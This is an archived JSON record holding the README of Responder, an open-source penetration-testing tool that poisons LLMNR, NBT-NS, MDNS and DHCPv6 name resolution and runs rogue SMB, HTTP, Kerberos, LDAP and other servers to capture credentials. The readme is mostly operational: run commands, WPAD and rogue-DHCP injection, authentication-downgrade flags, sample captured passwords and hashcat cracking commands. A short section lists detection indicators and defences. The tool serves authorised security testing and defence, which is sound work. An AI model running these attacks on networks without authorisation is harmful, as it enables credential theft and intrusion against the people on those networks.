{
	"id": "f430fc96-d142-4e30-8613-79f5a0e5a630",
	"created_at": "2026-04-06T00:09:18.467274Z",
	"updated_at": "2026-04-10T13:11:54.353624Z",
	"deleted_at": null,
	"sha1_hash": "70639b4e53ed2d884925e288071ea6991b2acd86",
	"title": "GitHub - lgandx/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 189036,
	"plain_text": "GitHub - lgandx/Responder: Responder is a LLMNR, NBT-NS and\r\nMDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP\r\nrogue authentication server supporting NTLMv1/NTLMv2/LMv2,\r\nExtended Security NTLMSSP and Basic HTTP authentication.\r\nBy lgandx\r\nArchived: 2026-04-05 21:12:05 UTC\r\nppyytthhoonn 22..77 || 33..xx\r\n lliicceennssee GGPPLL vv33\r\nResponder is a LLMNR, NBT-NS, and MDNS poisoner with built-in rogue authentication servers for HTTP,\r\nSMB, MSSQL, FTP, LDAP, Kerberos, DNS, and more. It supports NTLMv1/NTLMv2/LMv2, Extended Security\r\nNTLMSSP, and various authentication methods across 15+ protocols.\r\nTable of Contents\r\nOverview\r\nWhat's New\r\nInstallation\r\nQuick Start\r\nNetwork Poisoning\r\nRogue Servers\r\nConfiguration\r\nTroubleshooting\r\nOverview\r\nResponder captures credentials by responding to LLMNR, NBT-NS, and MDNS name resolution requests. When\r\na client attempts to resolve a non-existent hostname, Responder answers, directing the client to the attacker's\r\nmachine where multiple rogue authentication servers capture credentials. DHCP, DHCPv6 rogue servers are also\r\nincluded and can be enabled separately.\r\nCaptured Data:\r\nNetNTLMv1/v2 hashes - Crackable with hashcat/john\r\nKerberos AS-REQ hashes - Offline cracking (hashcat -m 7500)\r\nCleartext credentials - HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL, etc.\r\nChallenge-response - CRAM-MD5, DIGEST-MD5\r\nhttps://github.com/lgandx/Responder\r\nPage 1 of 23\n\nWhat's New\r\nThis version includes:\r\nDHCPv6 \u0026 DNS Enhancements\r\n✅ DHCPv6 INFORMATION-REQUEST - Full Windows 10/11 compatibility\r\n✅ Domain Filtering - Target specific domains (DHCPv6 \u0026 DNS)\r\n✅ Router Advertisements - Optional IPv6 network poisoning\r\nEmail Server Upgrades\r\n✅ SMTP STARTTLS - Capture from modern email clients\r\n✅ IMAP STARTTLS - Port 143 with TLS upgrade\r\n✅ IMAPS - Native SSL on port 993\r\n✅ Enhanced POP3 - Better compatibility\r\nKerberos Improvements\r\n✅ Force AS-REQ - Force kerberos authentication.\r\n✅ Attempt NTLM Fallback - After grabbing kerberos auth, return KDC_ERR_ETYPE_NOSUPP\r\nProtocol Enhancements\r\n✅ MSSQL - SQL Server authentication capture\r\n✅ LDAP/LDAPS - Directory service credentials\r\n✅ RDP - Remote Desktop authentication\r\n✅ WinRM - Windows Remote Management\r\n✅ DCERPC - Windows RPC authentication\r\nInstallation\r\nRequirements\r\nPython 2.7 or Python 3.x\r\nLinux (Ubuntu, Kali, Debian recommended)\r\nRoot privileges\r\nSystem Dependencies\r\nsudo apt-get update\r\nsudo apt-get install python3 python3-pip python3-netifaces\r\nInstall Responder\r\nhttps://github.com/lgandx/Responder\r\nPage 2 of 23\n\ngit clone https://github.com/lgandx/Responder.git\r\ncd Responder\r\npip3 install -r requirements.txt\r\nVerify Installation\r\nsudo python3 Responder.py --help\r\nQuick Start\r\nBasic Poisoning\r\n# Standard LLMNR/NBT-NS poisoning\r\nsudo python3 Responder.py -I eth0 -v\r\n# Analyze mode (passive monitoring)\r\nsudo python3 Responder.py -I eth0 -A -v\r\nDHCPv6 Attack\r\n# Edit Responder.conf first:\r\n# [DHCPv6 Server]\r\n# DHCPv6_Domain = corp.local\r\nsudo python3 Responder.py -I eth0 --dhcpv6 -v\r\nForce HTTP Basic Auth\r\nsudo python3 Responder.py -I eth0 -b -v\r\nEnable Proxy Auth + Rogue DHCP\r\n# Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)\r\nsudo python3 Responder.py -I eth0 -Pvd\r\nNetwork Poisoning\r\nLLMNR/NBT-NS/MDNS Poisoning\r\nhttps://github.com/lgandx/Responder\r\nPage 3 of 23\n\nPurpose: Respond to name resolution failures\r\nHow it works:\r\n1. Client broadcasts query for non-existent host\r\n2. Responder answers: \"I'm that host\"\r\n3. Client connects to attacker\r\n4. Credentials captured\r\nConfiguration:\r\n[Responder Core]\r\nLLMNR = On\r\nNBTNS = On\r\nMDNS = On\r\nUsage:\r\nsudo python3 Responder.py -I eth0 -v\r\nDHCPv6 Server\r\nPurpose: Force clients to use attacker's DNS via IPv6\r\nFeatures:\r\n✅ INFORMATION-REQUEST support (Windows 10/11)\r\n✅ SOLICIT/REQUEST support\r\n✅ Domain filtering (surgical targeting)\r\n✅ Router Advertisement (optional)\r\nHow it works:\r\n1. Windows sends DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST\r\n2. Responder responds: DNS = attacker IPv6\r\n3. Windows prioritizes IPv6 DNS\r\n4. All DNS queries → attacker\r\n5. DNS poisoning → credential capture\r\nConfiguration:\r\n[DHCPv6 Server]\r\n; Only respond to specific domain\r\nDHCPv6_Domain = corp.local\r\nhttps://github.com/lgandx/Responder\r\nPage 4 of 23\n\n; Send Router Advertisements\r\nSendRA = Off\r\n; IPv6 address to advertise\r\nBindToIPv6 = fe80::1\r\nUsage:\r\nsudo python3 Responder.py -I eth0 --dhcpv6 -v\r\nExpected Output:\r\n[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4\r\n[DHCPv6] Client domain: workstation.corp.local\r\n[DHCPv6] Matched target domain: corp.local\r\n[DHCPv6] Responding with DNS: fe80::1\r\n[DNS] Query: mail.corp.local (A)\r\n[DNS] Poisoned: mail.corp.local -\u003e 192.168.1.100\r\n[SMTP] Captured: user@corp.local:Password123\r\nRogue Servers\r\nResponder includes 17+ rogue authentication servers:\r\nFile \u0026 Network Services\r\nSMB Server (Ports 445, 139)\r\nPurpose: Capture NetNTLM hashes from file shares\r\nFeatures:\r\n✅ SMBv1/SMBv2/SMBv3\r\n✅ NetNTLMv1/v2 hash capture\r\n✅ Extended Security NTLMSSP\r\n✅ Session signing disabled (allows relay)\r\nTriggers:\r\n# UNC paths\r\n\\\\attacker-ip\\share\r\n\\\\non-existent-server\\files\r\n# NET USE commands\r\nhttps://github.com/lgandx/Responder\r\nPage 5 of 23\n\nnet use \\\\attacker-ip\\share\r\n# Windows Explorer address bar\r\n\\\\attacker-ip\\\r\nCaptured Format:\r\nusername::domain:challenge:response:blob\r\nCracking:\r\nhashcat -m 5600 smb-ntlmv2.txt wordlist.txt\r\nConfiguration:\r\n[Responder Core]\r\nSMB = On\r\nFTP Server (Port 21)\r\nPurpose: Capture cleartext FTP credentials\r\nFeatures:\r\n✅ Anonymous login honeypot\r\n✅ USER/PASS authentication\r\n✅ Cleartext credential capture\r\nTriggers:\r\nftp attacker-ip\r\n# Username: anything\r\n# Password: anything\r\nCaptured Format:\r\n[FTP] Cleartext: username:password\r\nConfiguration:\r\n[Responder Core]\r\nFTP = On\r\nhttps://github.com/lgandx/Responder\r\nPage 6 of 23\n\nDatabase Servers\r\nMSSQL Server (Port 1433)\r\nPurpose: Capture Microsoft SQL Server authentication\r\nFeatures:\r\n✅ SQL Server authentication\r\n✅ Windows authentication (NTLM)\r\n✅ Cleartext SQL credentials\r\n✅ NetNTLMv2 hash capture\r\nTriggers:\r\n-- SQL Server Management Studio\r\nServer: attacker-ip\r\nAuthentication: SQL Server / Windows\r\n-- Command line\r\nsqlcmd -S attacker-ip -U sa -P password\r\n-- Connection strings\r\nServer=attacker-ip;Database=master;User Id=sa;Password=pass;\r\nCaptured Formats:\r\n[MSSQL] SQL Auth: sa:password123\r\n[MSSQL] NetNTLMv2: DOMAIN\\user::domain:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nSQL = On\r\nNotes:\r\nCaptures both SQL authentication and Windows authentication\r\nWorks with SSMS, sqlcmd, ADO.NET connections\r\nCan capture domain credentials via Windows auth\r\nEmail Servers\r\nhttps://github.com/lgandx/Responder\r\nPage 7 of 23\n\nSMTP Server (Port 25, 587)\r\nPurpose: Capture email client authentication\r\nFeatures:\r\n✅ STARTTLS support (modern clients)\r\n✅ AUTH PLAIN (cleartext)\r\n✅ AUTH LOGIN (cleartext)\r\n✅ AUTH CRAM-MD5\r\n✅ AUTH DIGEST-MD5\r\n✅ AUTH NTLM (NetNTLMv2)\r\nSTARTTLS Flow:\r\nClient → EHLO\r\nServer → 250-STARTTLS\r\nClient → STARTTLS\r\nServer → 220 Ready to start TLS\r\n[TLS handshake using self-signed cert]\r\nClient → AUTH PLAIN \u003ccredentials\u003e\r\nServer → Captured! ✅\r\nTriggers:\r\nEmail client configuration:\r\n- Server: attacker-ip\r\n- Port: 25 or 587\r\n- Security: STARTTLS or None\r\n- Username: anything\r\n- Password: anything\r\nCaptured Formats:\r\n[SMTP] LOGIN: user@company.com:Password123\r\n[SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\n[SMTP] CRAM-MD5: user:challenge:response\r\nConfiguration:\r\n[Responder Core]\r\nSMTP = On\r\nhttps://github.com/lgandx/Responder\r\nPage 8 of 23\n\nCertificate Warnings: Self-signed cert warnings are normal. Clients reject first attempt, retry, and succeed.\r\nCredentials still captured.\r\nIMAP Server (Port 143)\r\nPurpose: Capture IMAP authentication with STARTTLS\r\nFeatures:\r\n✅ STARTTLS support\r\n✅ LOGIN command (cleartext)\r\n✅ AUTHENTICATE PLAIN\r\n✅ AUTHENTICATE LOGIN\r\n✅ AUTHENTICATE NTLM\r\nSTARTTLS Flow:\r\nClient → CAPABILITY\r\nServer → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS\r\nClient → STARTTLS\r\nServer → OK Begin TLS negotiation now\r\n[TLS upgrade]\r\nClient → LOGIN user password\r\nServer → Captured! ✅\r\nConfiguration:\r\n[Responder Core]\r\nIMAP = On\r\nIMAPS Server (Port 993)\r\nPurpose: IMAP over SSL (native encryption)\r\nFeatures:\r\n✅ Native SSL from connection start\r\n✅ All IMAP authentication methods\r\n✅ No STARTTLS needed (already encrypted)\r\nHow it differs from IMAP:\r\nPort 143 (IMAP): Plain → STARTTLS → Encrypted\r\nhttps://github.com/lgandx/Responder\r\nPage 9 of 23\n\nPort 993 (IMAPS): Encrypted from start\r\nConfiguration:\r\n[Responder Core]\r\nIMAPS = On\r\nPOP3 Server (Port 110)\r\nPurpose: Capture POP3 email retrieval credentials\r\nFeatures:\r\n✅ USER/PASS authentication\r\n✅ APOP (MD5 challenge)\r\n✅ Cleartext credential capture\r\nTriggers:\r\nEmail client:\r\n- Protocol: POP3\r\n- Server: attacker-ip\r\n- Port: 110\r\nCaptured Format:\r\n[POP3] USER: username\r\n[POP3] PASS: password\r\nConfiguration:\r\n[Responder Core]\r\nPOP = On\r\nWeb Servers\r\nHTTP Server (Port 80)\r\nPurpose: Capture web authentication\r\nFeatures:\r\n✅ NTLM authentication (NetNTLMv1/v2)\r\nhttps://github.com/lgandx/Responder\r\nPage 10 of 23\n\n✅ Basic authentication (cleartext)\r\n✅ Digest authentication (MD5)\r\n✅ WPAD injection\r\nTriggers:\r\nBrowser: http://attacker-ip/\r\nUNC: file://attacker-ip/share\r\nWPAD: Automatic proxy detection\r\nForce Basic Auth:\r\nsudo python3 Responder.py -I eth0 -b\r\nCaptured Formats:\r\n[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob\r\n[HTTP] Basic: user:password\r\n[HTTP] Digest: user:realm:hash\r\nConfiguration:\r\n[Responder Core]\r\nHTTP = On\r\nHTTPS Server (Port 443)\r\nPurpose: HTTPS with authentication capture\r\nFeatures:\r\n✅ SSL/TLS encryption\r\n✅ All HTTP authentication methods\r\n✅ Self-signed certificate\r\n✅ WPAD over HTTPS\r\nConfiguration:\r\n[Responder Core]\r\nHTTPS = On\r\nSSLCert = certs/responder.crt\r\nSSLKey = certs/responder.key\r\nhttps://github.com/lgandx/Responder\r\nPage 11 of 23\n\nDirectory \u0026 Authentication\r\nKerberos Server (Port 88)\r\nPurpose: Capture AS-REP hashes for offline cracking\r\nFeatures:\r\n✅ AES256-CTS-HMAC-SHA1-96 (etype 18)\r\n✅ AES128-CTS-HMAC-SHA1-96 (etype 17)\r\n✅ ARCFOUR-HMAC-MD5 (etype 23)\r\nHow it works:\r\n1. Client sends AS-REQ (TGT request)\r\n2. Responder: \"Pre-authentication required\"\r\n3. Client sends AS-REQ with encrypted timestamp\r\n4. Responder captures encrypted timestamp\r\n5. Crack offline with hashcat\r\nCracking:\r\nhashcat -m 7500 kerberos-asreq.txt wordlist.txt\r\nConfiguration:\r\n[Responder Core]\r\nKerberos = On\r\nLDAP Server (Port 389)\r\nPurpose: Capture LDAP directory authentication\r\nFeatures:\r\n✅ Simple authentication (cleartext)\r\n✅ NTLM authentication\r\n✅ Active Directory queries\r\nTriggers:\r\n# LDAP query\r\nldapsearch -H ldap://attacker-ip -D \"CN=user,DC=corp,DC=local\" -w password\r\nhttps://github.com/lgandx/Responder\r\nPage 12 of 23\n\n# Active Directory tools\r\ndsquery user -d attacker-ip\r\nCaptured Formats:\r\n[LDAP] Simple: CN=user,DC=corp,DC=local:password\r\n[LDAP] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nLDAP = On\r\nLDAPS Server (Port 636)\r\nPurpose: LDAP over SSL\r\nFeatures:\r\n✅ SSL/TLS encryption\r\n✅ All LDAP authentication methods\r\nConfiguration:\r\n[Responder Core]\r\nLDAP = On\r\nRemote Access\r\nRDP Server (Port 3389)\r\nPurpose: Capture Remote Desktop authentication\r\nFeatures:\r\n✅ Network Level Authentication (NLA)\r\n✅ NetNTLMv2 hash capture\r\n✅ CredSSP authentication\r\nTriggers:\r\nRemote Desktop Client:\r\n- Computer: attacker-ip\r\nhttps://github.com/lgandx/Responder\r\nPage 13 of 23\n\n- Username: anything\r\n- Password: anything\r\nCaptured Format:\r\n[RDP] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nRDP = On\r\nNote: Captures NLA authentication before desktop session.\r\nWinRM Server (Ports 5985, 5986)\r\nPurpose: Capture Windows Remote Management credentials\r\nFeatures:\r\n✅ HTTP (5985) and HTTPS (5986)\r\n✅ Basic authentication\r\n✅ NTLM authentication\r\n✅ Kerberos authentication\r\nTriggers:\r\n# PowerShell remoting\r\nEnter-PSSession -ComputerName attacker-ip\r\nInvoke-Command -ComputerName attacker-ip -ScriptBlock { whoami }\r\n# WinRM command line\r\nwinrm invoke -remote:http://attacker-ip\r\nCaptured Formats:\r\n[WinRM] Basic: DOMAIN\\user:password\r\n[WinRM] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nhttps://github.com/lgandx/Responder\r\nPage 14 of 23\n\nWINRM = On\r\nInfrastructure\r\nDNS Server (Port 53 TCP/UDP)\r\nPurpose: Rogue DNS with domain filtering\r\nFeatures:\r\n✅ A/AAAA record poisoning\r\n✅ MX record poisoning (email redirection)\r\n✅ SOA records (appear authoritative)\r\n✅ SRV records (Kerberos, LDAP)\r\n✅ SVCB/HTTPS records (modern browsers)\r\n✅ EDNS0 support\r\n✅ Domain filtering\r\nConfiguration:\r\n[DHCPv6 Server]\r\n; DNS uses same domain filter as DHCPv6\r\nDHCPv6_Domain = corp.local\r\nHow it works:\r\nQuery: mail.corp.local\r\nResponse: 192.168.1.100 (attacker)\r\nClient connects to attacker's SMTP\r\nCredentials captured!\r\nSupported Record Types:\r\nA (IPv4) - Redirect to attacker\r\nAAAA (IPv6) - Redirect to attacker\r\nMX (Mail) - Email server poisoning\r\nSRV (Services) - Kerberos, LDAP, etc.\r\nSOA (Authority) - Appear as authoritative\r\nTXT (Text) - SPF records\r\nSVCB/HTTPS (Service Binding) - Modern browsers\r\nDomain Filtering Example:\r\nhttps://github.com/lgandx/Responder\r\nPage 15 of 23\n\nDHCPv6_Domain = corp.local\r\nmail.corp.local → POISONED ✅\r\ndc01.corp.local → POISONED ✅\r\ngoogle.com → IGNORED (normal DNS)\r\nConfiguration:\r\n[Responder Core]\r\nDNS = On\r\nDCERPC Server (Port 135)\r\nPurpose: Capture Windows RPC authentication\r\nFeatures:\r\n✅ NTLM authentication\r\n✅ Windows service enumeration\r\n✅ NetNTLMv2 capture\r\nTriggers:\r\nWindows services querying RPC endpoint mapper\r\nWMI queries\r\nRemote registry access\r\nCaptured Format:\r\n[DCERPC] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nDCERPC = On\r\nConfiguration\r\nMain Configuration File\r\nEdit Responder.conf :\r\nhttps://github.com/lgandx/Responder\r\nPage 16 of 23\n\n[Responder Core]\r\n; === Network Services ===\r\nSQL = On # MSSQL (port 1433)\r\nSMB = On # SMB (ports 445, 139)\r\nRDP = On # Remote Desktop (port 3389)\r\nKerberos = On # Kerberos (port 88)\r\nFTP = On # FTP (port 21)\r\nPOP = On # POP3 (port 110)\r\nSMTP = On # SMTP with STARTTLS (port 25/587)\r\nIMAP = On # IMAP with STARTTLS (port 143)\r\nIMAPS = On # IMAPS with SSL (port 993)\r\nHTTP = On # HTTP (port 80)\r\nHTTPS = On # HTTPS (port 443)\r\nDNS = On # DNS (port 53)\r\nLDAP = On # LDAP/LDAPS (ports 389/636)\r\nDCERPC = On # Windows RPC (port 135)\r\nWINRM = On # Windows Remote Management (ports 5985/5986)\r\n; === Poisoners ===\r\nLLMNR = On # Link-Local Multicast Name Resolution\r\nNBTNS = On # NetBIOS Name Service\r\nMDNS = On # Multicast DNS\r\nDHCP = Off # DHCP (IPv4) - use with caution\r\nDHCPv6 = On # DHCPv6 (IPv6) - use with more caution\r\n; === Settings ===\r\nSessionLog = On\r\nLogToFile = On\r\nVerbose = Yes\r\nDatabase = Responder.db\r\n; === SSL Certificates ===\r\nSSLCert = certs/responder.crt\r\nSSLKey = certs/responder.key\r\n[HTTP Server]\r\nHtmlFilename = files/AccessDenied.html\r\n[DHCPv6 Server]\r\n; Target specific domain\r\nDHCPv6_Domain = corp.local\r\n; Send Router Advertisements (use with caution)\r\nSendRA = Off\r\nhttps://github.com/lgandx/Responder\r\nPage 17 of 23\n\n; IPv6 address to advertise\r\nBindToIPv6 = fe80::1\r\nCommand-Line Options\r\nBasic Usage\r\nsudo python3 Responder.py [options]\r\nRequired Arguments\r\nOption Description\r\n-I eth0, --interface=eth0 Network interface to use (use 'ALL' for all interfaces)\r\nPoisoning Options\r\nOption Description\r\n-A, --analyze Analyze mode - See NBT-NS, MDNS, LLMNR requests without responding\r\n-w, --wpad Start WPAD rogue proxy server (default: Off)\r\n-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat retrieval (old networks)\r\n-P, --ProxyAuth Force NTLM/Basic authentication for proxy (highly effective)\r\nDHCP/DHCPv6 Options\r\nOption Description\r\n-d, --DHCP Enable DHCP broadcast responses with WPAD injection (IPv4)\r\n-D, --DHCP-DNS Inject DNS server in DHCP response instead of WPAD\r\n--dhcpv6 Enable DHCPv6 poisoning (responds to SOLICIT messages)\r\nIP poisoning Options\r\nOption Description\r\n-e 10.0.0.22, --externalip=10.0.0.22 Poison requests with another IPv4 address\r\n-6 ADDR, --externalip6=ADDR Poison requests with another IPv6 address\r\n-i 10.0.0.21, --ip=10.0.0.21 Local IP to use (OSX only)\r\nhttps://github.com/lgandx/Responder\r\nPage 18 of 23\n\nAuthentication Options\r\nOption Description\r\n-b, --basic Return HTTP Basic authentication (default: NTLM)\r\n--lm Force LM hashing downgrade (Windows XP/2003)\r\n--disable-ess Force Extended Security NTLMSSP downgrade\r\nAdvanced Options\r\nOption Description\r\n-u HOST:PORT, --upstream-proxy=HOST:PORT\r\nUpstream HTTP proxy for rogue WPAD\r\n-t 1e, --ttl=1e\r\nChange Windows TTL for poisoned answers (hex: 30s=1e, or\r\n'random')\r\n-N NAME, --AnswerName=NAME\r\nCanonical name for LLMNR answers (useful for Kerberos\r\nrelay)\r\n-E, --ErrorCode\r\nReturn STATUS_LOGON_FAILURE (enables WebDAV auth\r\ncapture)\r\nOutput Options\r\nOption Description\r\n-v, --verbose Increase verbosity (recommended)\r\n-Q, --quiet Quiet mode - Disable poisoner output\r\nInformation\r\nOption Description\r\n--version Show program version and exit\r\n-h, --help Show help message and exit\r\nStorage Locations\r\nResponder.db # SQLite database\r\nlogs/\r\nhttps://github.com/lgandx/Responder\r\nPage 19 of 23\n\n├── HTTP-NTLMv2-\u003cIP\u003e.txt # HTTP NetNTLMv2 hashes\r\n├── SMB-NTLMv2-\u003cIP\u003e.txt # SMB NetNTLMv2 hashes\r\n├── MSSQL-NTLMv2-\u003cIP\u003e.txt # MSSQL NetNTLMv2 hashes\r\n├── Kerberos-AES-\u003cIP\u003e.txt # Kerberos AS-REP hashes\r\n├── SMTP-Cleartext-\u003cIP\u003e.txt # SMTP cleartext credentials\r\n├── IMAP-NTLMv2-\u003cIP\u003e.txt # IMAP NetNTLMv2 hashes\r\n├── FTP-Cleartext-\u003cIP\u003e.txt # FTP cleartext credentials\r\n├── LDAP-Cleartext-\u003cIP\u003e.txt # LDAP cleartext credentials\r\n├── RDP-NTLMv2-\u003cIP\u003e.txt # RDP NetNTLMv2 hashes\r\n└── WinRM-NTLMv2-\u003cIP\u003e.txt # WinRM NetNTLMv2 hashes\r\nDatabase Query\r\nsqlite3 Responder.db\r\n# Show tables\r\n.tables\r\n# Show all captured hashes\r\nSELECT * FROM hashes;\r\n# Export to CSV\r\n.mode csv\r\n.output hashes.csv\r\nSELECT * FROM hashes;\r\n.quit\r\nOpSec Considerations\r\nDetection Indicators:\r\nUnusual LLMNR/NBT-NS responses\r\nRogue DHCP/DHCPv6 server\r\nInvalid Kerberos pre-auth requests\r\nSelf-signed SSL certificates\r\nMultiple authentication failures\r\nSuspicious DNS responses\r\nDefensive Measures:\r\nDisable MDNS/LLMNR/NBT-NS via GPO\r\nEnable DHCP snooping on the switch\r\nEnable IPv6 RA guard\r\nEnable DHCPv6 guard\r\nhttps://github.com/lgandx/Responder\r\nPage 20 of 23\n\nMonitor for rogue DHCPv6 servers\r\nTroubleshooting\r\nCommon Issues\r\nPermission Denied:\r\nsudo python3 Responder.py -I eth0\r\nInterface Not Found:\r\nip link show\r\nsudo python3 Responder.py -I wlan0\r\nPort Already in Use:\r\nsudo netstat -tulpn | grep 445\r\nsudo systemctl stop smbd nmbd\r\nDHCPv6 Not Working:\r\n# Enable IPv6\r\nsudo sysctl -w net.ipv6.conf.all.disable_ipv6=0\r\n# Verify\r\nsysctl net.ipv6.conf.all.disable_ipv6\r\nNo Hashes Captured:\r\n# Verify servers running\r\nsudo python3 Responder.py -I eth0 -v\r\n# Check firewall\r\nsudo iptables -L\r\n# Monitor traffic\r\nsudo tcpdump -i eth0 port 445 or port 88 or port 389\r\nDebug Mode\r\nhttps://github.com/lgandx/Responder\r\nPage 21 of 23\n\n# Very verbose output\r\nsudo python3 Responder.py -I eth0 -vv\r\n# Tail logs\r\ntail -f logs/Responder-Session.log\r\n# Network monitoring\r\nsudo tcpdump -i eth0 -w responder-capture.pcap\r\nCredits\r\nAuthor: Laurent Gaffié\r\nGitHub: https://github.com/lgandx\r\nWebsite: https://secorizon.com/\r\nTwitter: @secorizon\r\nDonation\r\nYou can contribute to this project by donating to the following USDT or Bitcoin address:\r\nUSDT: 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A\r\nBTC: bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49\r\nPaypal:\r\nhttps://paypal.me/PythonResponder\r\nAcknowledgments\r\nLate Responder development has been possible because of the donations received from individuals and\r\ncompanies.\r\nWe would like to thanks those major sponsors:\r\nSecureWorks: https://www.secureworks.com/\r\nSynacktiv: https://www.synacktiv.com/\r\nBlack Hills Information Security: http://www.blackhillsinfosec.com/\r\nTrustedSec: https://www.trustedsec.com/\r\nRed Siege Information Security: https://www.redsiege.com/\r\nhttps://github.com/lgandx/Responder\r\nPage 22 of 23\n\nOpen-Sec: http://www.open-sec.com/\r\nAnd all, ALL the pentesters around the world who donated to this project.\r\nThank you.\r\nSource: https://github.com/lgandx/Responder\r\nhttps://github.com/lgandx/Responder\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/lgandx/Responder"
	],
	"report_names": [
		"Responder"
	],
	"threat_actors": [],
	"ts_created_at": 1775434158,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/70639b4e53ed2d884925e288071ea6991b2acd86.pdf",
		"text": "https://archive.orkl.eu/70639b4e53ed2d884925e288071ea6991b2acd86.txt",
		"img": "https://archive.orkl.eu/70639b4e53ed2d884925e288071ea6991b2acd86.jpg"
	}
}